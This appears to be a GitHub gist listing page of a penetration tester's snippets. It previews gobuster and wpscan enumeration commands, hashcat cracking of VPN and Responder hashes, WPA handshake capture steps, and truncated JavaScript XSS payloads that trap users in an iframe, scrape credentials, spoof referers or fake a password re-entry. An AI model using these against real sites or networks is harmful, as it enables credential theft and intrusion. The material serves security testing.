This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Using the proxy (burp) can result in rediculously huge project files. You've been warned. | |
gobuster dir -u https://SOMEURL.com -w /some/word/list.txt -p http://localhost:8080 -k -l | |
gobuster dir -u https://SOMEURL.com -w /some/word/list.txt -k -l | |
If you can use --wildcard if it's choking on responses, however if it's sending back 302's for nonexistant, | |
just change up the accepted status codes: | |
gobuster dir -u https://SOMNEURL.com -w /som/word/list.txt -k -l -s 200,204,301,307,401,403 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
alert('Click ok when you\'re ready to enter iframe trap'); | |
// Example Credential scraper and | |
// XSS iframe trap. Load from whatever | |
// page has the reflected/stored XSS vuln | |
// trap the user in an iframe of the app. | |
// Frame the login page, and copy out the | |
// username and password fields. | |
// @hoodoer |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Save the current URL path to restore after making | |
// malicious request with faked referer header value | |
var savedPath = window.location.pathname; | |
var savedSearch = window.location.search; | |
// Change URL/History to control the referer header value | |
// Swap out "/this-is-my-fake-referer-value" to be what you need | |
window.history.replaceState(null, '', '/this-is-my-fake-referer-value'); | |
// Send malicious request with faked referer header value |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function start() | |
{ | |
alert("Start?"); | |
} | |
function sendRequests() | |
{ | |
// Setup the payment |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
IKE-PSK: | |
./hashcat -m 5300 vpn.psk ../PasswordLists/Top109Million-probable-v2.txt -a 0 -r rules/wtf.rule -O | |
Responder: | |
hashcat -m 5600 hashes\hash.txt password_list.txt -o cracked\cracked.txt -O -r rules/best64.rule | |
example: | |
./hashcat -m 5600 hashes.txt ../../VM\ Share/PasswordLists/rockyou.txt -o passwords.txt -O -r rules/best66.rule |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
alert('Click ok when you\'re ready to enter iframe trap'); | |
// Example XSS iframe trap. Load from whatever | |
// page has the reflected/stored XSS vuln | |
// trap the user in an iframe of the app. | |
// While they surf around, they stick in your | |
// iFrame, and you keep their session and your XSS | |
// payload running. | |
// @hoodoer |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
wpscan.rb --url http://yourwebsite.com --enumerate dbe | |
database exports | |
wpscan.rb --url http://yourwebsite.com --enumerate cb | |
config backups | |
wpscan.rb --url http://yourwebsite.com --enumerate vp | |
vuln plugins | |
wpscan.rb --url http://yourwebsite.com --enumerate vt |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
https://whatismyipaddress.com/blacklist-check | |
https://ipcheck.proofpoint.com/ | |
https://www.ipvoid.com/ip-blacklist-check/ | |
https://talosintelligence.com/reputation_center | |
https://www.cyren.com/security-center/cyren-ip-reputation-check |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<body> | |
<script> | |
// Fake the application with a screenshot | |
document.body.outerHTML = ''; | |
document.body.innerHTML = ''; | |
document.body.style.backgroundImage = "url('http://localhost:80/background.png')"; | |
document.body.style.backgroundRepeat = "no-repeat"; | |
// Ask user to re-enter their password |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
airmon-ng check kill | |
https://forums.hak5.org/topic/37247-capturing-wpawpa2-passwords-with-the-nanotetra/ | |
On nano, or other wifi access point monitoring: | |
airmon-ng start wlan1 | |
airodump-ng -w PacketCapture wlan1mon | |
(Then just do near the AP you're wanting to crack and wait for someone to connect to it.) |
NewerOlder